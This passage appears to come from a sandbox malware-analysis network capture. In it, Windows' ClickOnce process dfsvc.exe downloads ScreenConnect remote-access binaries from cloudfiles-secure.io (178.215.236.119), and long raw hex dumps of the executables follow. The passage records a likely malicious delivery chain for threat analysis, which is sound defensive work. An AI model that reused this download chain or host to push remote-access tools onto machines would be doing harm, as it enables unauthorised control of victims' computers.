00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e Data Ascii: p<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.
2024-10-02 04:16:36 UTC	16384	IN	Data Raw: 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49761	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:38 UTC	104	OUT	GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip
2024-10-02 04:16:38 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 601376 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:37 GMT Connection: close
2024-10-02 04:16:38 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
2024-10-02 04:16:38 UTC	16384	IN	Data Raw: 00 0a 2a 00 00 1b 30 06 00 ef 0d 00 00 2c 00 00 11 73 ab 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 25 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 36 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4a 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4a 06 00 06 13 08 11 04 7b 16 03 00 04 6f 15 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a Data Ascii: 0,s}(u,rp(v(w(x}H((((~%-&~%s%(3+o8$o}{(,+{o(6{o)(J{o(J{o(%o
2024-10-02 04:16:38 UTC	16384	IN	Data Raw: 02 7b 54 00 00 04 6f 0b 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 14 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f b8 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 14 03 00 0a 74 9a 00 00 01 17 6f 15 03 00 0a 26 02 7b 54 00 00 04 14 6f 7b 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0b 07 00 06 8c b6 00 00 02 a2 28 07 03 00 0a 02 7b 54 00 00 04 6f 0b 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0a 03 00 0a 6f 45 01 00 0a 2b Data Ascii: {To.{To0b{To,M{Z(o{To{T{Toto&{To{(<(<*0Grp%3%{To({To..'+5{Z(o-"(soE+
2024-10-02 04:16:38 UTC	16384	IN	Data Raw: 73 27 04 00 0a 28 b2 00 00 2b 28 b3 00 00 2b 6f 28 04 00 0a 2a c2 02 28 29 04 00 0a 02 7e 2a 04 00 0a 28 2b 04 00 0a 02 20 02 60 00 00 17 28 2c 04 00 0a 02 02 fe 06 dd 01 00 06 73 2d 04 00 0a 28 2e 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02 7b 9f 00 00 04 2a 22 02 03 7d 9f 00 00 04 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 1e 02 7b a3 00 00 04 2a 22 02 03 7d a3 00 00 04 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 Data Ascii: s'(+(+o(()~(+ `(,s-(.{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}
2024-10-02 04:16:38 UTC	16384	IN	Data Raw: 00 0a 2c 07 02 28 a4 02 00 06 2a 02 6f 18 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 93 00 00 11 02 28 61 05 00 0a 2d 1d 02 28 9b 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 9b 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a2 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 a2 02 00 06 2a 02 6f 17 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 9f 02 00 06 2c 07 02 28 9f 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 a6 02 00 06 2c 07 02 28 a6 02 00 06 2a 02 6f c6 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 a1 02 00 06 2c 07 02 28 a1 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 aa 02 00 06 2c 07 02 28 aa 02 00 06 2a 02 28 99 02 00 06 2a 00 00 00 1b 30 06 00 f0 00 00 00 94 00 00 11 02 03 28 ce 01 00 06 02 6f c4 02 00 06 0a 12 00 28 63 Data Ascii: ,(o0Q(a-((b,({,((b,(o(a-(,({,(,(o(a-(,({,(,((*0(o(c
2024-10-02 04:16:38 UTC	16384	IN	Data Raw: 08 06 00 0a 2a 32 02 7b 38 01 00 04 6f 09 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 0a 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 07 00 29 00 00 00 5a 00 00 11 02 02 7b 3a 01 00 04 73 8a 03 00 06 25 02 02 7b 39 01 00 04 0a 06 17 58 7d 39 01 00 04 06 6f 89 03 00 06 28 50 01 00 2b 2a 66 02 16 7d 39 01 00 04 02 28 83 03 00 06 02 7b 38 01 00 04 6f 0b 06 00 0a 2a 1e 02 28 83 03 00 06 2a 32 02 7b 38 01 00 04 6f 0c 06 00 0a 2a 32 02 7b 38 01 00 04 28 72 01 Data Ascii: 2{8o6{8o0){:(t\|:(O+30){:(t\|:(O+30)Z{:s%{9X}9o(P+f}9({8o(2{8o*2{8(r
2024-10-02 04:16:38 UTC	16384	IN	Data Raw: 7b 3d 05 00 04 2c 0b 06 7b 3d 05 00 04 6f 22 00 00 0a dc 06 7b 3c 05 00 04 2c 0b 06 7b 3c 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 60 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 ad 01 00 06 02 20 16 22 00 00 17 28 2c 04 00 0a 02 17 28 b1 07 00 0a 02 22 00 00 80 3f 7d 73 01 00 04 02 7e bb 05 00 0a 28 0d 05 00 06 73 82 05 00 0a 7d 74 01 00 04 02 18 17 16 16 02 73 b2 07 00 0a 7d 71 01 00 04 2a 00 00 13 30 03 00 29 00 00 00 16 00 00 11 02 7b 78 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 01 00 00 1b 0c 02 7c 78 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 Data Ascii: {=,{=o"{<,{<o",o"(`&4iA5$0J( "(,("?}s~(s}ts}q0){x(t\|x(+3*0
2024-10-02 04:16:38 UTC	16384	IN	Data Raw: 28 d1 01 00 2b 7e 85 05 00 04 fe 06 dd 0a 00 06 73 60 01 00 0a 28 21 00 00 2b 0c 28 92 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 41 05 00 06 28 c3 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 92 08 00 0a 02 6f 41 05 00 06 28 c3 04 00 06 7e aa 00 00 0a 02 6f b0 03 00 0a 6f 93 08 00 0a 2a 2e 28 c2 04 00 06 6f 5e 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 4a 05 00 06 2a 2e 28 c2 04 00 06 6f 4c 05 00 06 2a 2e 28 c2 04 00 06 6f 48 05 00 06 2a 2e 28 c2 04 00 06 6f 42 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 46 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 62 05 00 06 2a 2e 28 c2 04 00 06 6f 64 05 00 06 2a 2e 28 c2 04 00 06 6f 66 05 00 06 2a 2e 28 c2 04 Data Ascii: (+~s`(!+(%-&(oA(~(oA(~oo.(o^.(oD.(oJ.(oL.(oH.(oB.(oD.(oF.(oD.(ob.(od.(of.(
2024-10-02 04:16:38 UTC	16384	IN	Data Raw: 0a 25 80 d2 05 00 04 16 28 21 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 41 01 00 11 73 9f 09 00 0a 0a 06 03 7d a0 09 00 0a 02 06 fe 06 a1 09 00 0a 73 a2 09 00 0a 15 28 16 02 00 2b 7e a3 09 00 0a 25 2d 17 26 7e a4 09 00 0a fe 06 a5 09 00 0a 73 a6 09 00 0a 25 80 a3 09 00 0a 28 17 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 42 01 00 11 7e a7 09 00 0a 72 18 40 00 70 02 8c 64 00 00 01 28 1d 06 00 0a 6f a8 09 00 0a 0a 06 14 fe 03 0b de 0a 06 2c 06 06 6f 22 00 00 0a dc 07 2a 00 00 01 10 00 00 02 00 1b 00 07 22 00 0a 00 00 00 00 aa 28 01 03 00 0a 1c 16 73 02 03 00 0a 28 03 03 00 0a 2c 15 d0 23 03 00 01 28 bf 00 00 0a 6f 93 07 00 0a 28 10 06 00 06 2a 16 2a 56 28 11 06 00 06 2d 07 02 73 f2 06 00 06 2a 02 73 ed 06 00 06 2a 66 28 11 06 00 06 2d 09 02 03 04 73 e9 Data Ascii: %(!+0EAs}s(+~%-&~s%(+0.B~r@pd(o,o""(s(,#(o(V(-ss*f(-s
2024-10-02 04:16:38 UTC	16384	IN	Data Raw: 6f fc 01 00 0a 02 17 28 13 0b 00 0a 02 28 14 0b 00 0a 02 28 bb 01 00 0a 28 f9 01 00 0a 2a 76 02 28 23 08 00 0a 25 20 00 00 00 80 6f e5 04 00 0a 25 20 88 00 00 00 6f e6 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 91 01 00 11 0f 01 28 f0 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f3 01 00 0a 28 15 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f3 01 00 0a 28 86 00 00 0a 73 3b 05 00 0a 2a 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 f6 01 00 0a 17 28 10 07 00 06 0a 12 00 28 08 03 00 0a 2d 64 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 16 0b 00 0a 17 28 10 07 00 06 0b 12 01 28 08 03 00 0a 2d 3f 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 f1 01 00 0a 16 28 10 07 00 06 0c 12 02 28 08 03 00 0a 2d 1a 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 ed 01 00 0a 16 28 10 07 00 06 Data Ascii: o((((v(#% o% o0(,+((((,((s;*(((((-d(((((-?(((((-((((

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49762	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:39 UTC	95	OUT	GET /Bin/ScreenConnect.Core.dll HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip
2024-10-02 04:16:40 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 548864 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:40 GMT Connection: close
2024-10-02 04:16:40 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
2024-10-02 04:16:40 UTC	16384	IN	Data Raw: 06 26 2a 1e 02 7b 6c 01 00 0a 2a 22 02 03 7d 6c 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6d 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 46 01 00 0a 0a 02 7b 6e 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 15 07 00 06 04 6f 15 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 15 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 15 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72 Data Ascii: &{l"}l:(<(m0(<oF{n-(++,}n{n>oo>(o}p03=-(qo{p_,B{r,(stsu(,+&}p\|r*o{p3{r
2024-10-02 04:16:40 UTC	16384	IN	Data Raw: 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c6 02 00 0a 0a 2b 30 03 04 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b5 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a7 0e 00 06 73 cb 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e9 04 00 06 28 80 Data Ascii: :(}+(~+&0TBE +(s+0s+&s+s+rpszZ(<(~%-&~s%(+0%(-o(-:((
2024-10-02 04:16:40 UTC	16384	IN	Data Raw: 00 d4 00 00 11 02 03 6f 3a 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 86 03 00 0a 02 06 17 58 6f f2 02 00 0a 28 59 00 00 2b 73 39 04 00 0a 2a fe 02 25 2d 06 26 7e 98 01 00 0a 03 6f 8c 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 b9 0e 00 06 73 9f 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 9a 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3b 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00 Data Ascii: o:3oXo(Y+s9%-&~o~%-&~s%(+(n(r+n((>s%}s'~%-&Ds;%(+(+(+-j+j(L(+&f__`v(
2024-10-02 04:16:40 UTC	16384	IN	Data Raw: 00 fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 54 07 00 06 28 56 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 56 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 58 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5a 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5c 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5e 07 00 06 28 56 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 60 07 00 06 0b 12 01 fe 16 2c 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 62 07 00 06 0c 12 02 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 64 07 00 06 0d 12 03 28 2f 05 00 0a Data Ascii: %rp%(T(V%rp%(V(%rp%(X(%r"p%(Z(%r4p%(\(%r2p%(^(V%rHp%(`,oC%rhp%(b-oC%rp%(d(/
2024-10-02 04:16:40 UTC	16384	IN	Data Raw: 28 f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2a 06 00 0a 28 81 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2b 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 36 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3e 0a 00 06 5a 1e 28 19 04 00 06 02 28 3f 0a 00 06 58 2a 86 02 03 04 28 3d 0a 00 06 02 05 75 98 00 00 02 7d dc 03 00 04 02 05 75 97 00 00 02 7d dd 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b dc 03 00 04 28 Data Ascii: (jX}{~(+0)Q{(+tO\|(+30)Q{(-tO\|(+3V(6}}{{Z(>Z((?X(=u}u}*(c,{(
2024-10-02 04:16:40 UTC	16384	IN	Data Raw: 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 16 07 00 0a 0a 2b 26 06 6f 17 07 00 0a 0b 07 04 07 6f 0a 0c 00 06 02 05 07 6f 09 0c 00 06 28 0a 09 00 06 6f 0d 0c 00 06 28 02 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b 40 04 00 04 2a 1e 02 7b 41 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07 Data Ascii: o-,o290Dyo+&ooo(o(o-,o29(<}=}>}?}@}A{={>{?{@{A0G*~-:~(,~
2024-10-02 04:16:40 UTC	16384	IN	Data Raw: 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 60 01 00 0a 0a 03 04 0e 04 0e 05 06 28 32 02 00 0a 06 2a 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ac 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 b5 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 3b 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 36 02 00 06 2a 00 00 00 13 30 03 00 1b 00 Data Ascii: :j*****0iY(`(2sjz(<.s2(<2{3oB(<6{o{(<6{o{.s8(<"(]"(c(<0{;(+d(zo60
2024-10-02 04:16:40 UTC	16384	IN	Data Raw: 07 00 04 28 56 06 00 06 8c da 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 2f 0a 00 0a 16 6f 30 0a 00 0a 2a 36 02 7b 2f 0a 00 0a 17 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 22 05 00 0a 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 0b 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 22 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 12 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 52 0b 00 06 2a 3a 0f 01 fe 16 4e 01 00 02 6f 43 00 00 0a 2a 2e 73 16 10 00 06 80 2d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c4 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a Data Ascii: (V(<6{/o06{/o0(<J{"{#(1(<J{'{((1.s%(<o"oC.s((<oC.s(<"(R:NoC.s-(<:oC(<
2024-10-02 04:16:40 UTC	16384	IN	Data Raw: 01 f7 02 01 00 10 00 4c b0 00 00 ad 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 89 2e 01 00 ad 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 ad 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 ad 3d 01 00 35 00 90 01 04 03 01 01 00 00 a0 6a 01 00 ad 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 ad 3d 01 00 c5 00 96 01 05 03 09 01 10 00 ba 36 01 00 ad 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 6c 50 01 00 ad 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 ad 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 1c 3b 01 00 ad 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 12 00 01 00 ad 3d 01 00 6d 00 a8 01 4d 03 81 01 10 00 52 3b 01 00 ad 3d 01 00 35 00 ab 01 61 03 01 20 10 00 84 e3 00 00 ad 3d 01 00 35 00 ad 01 6a 03 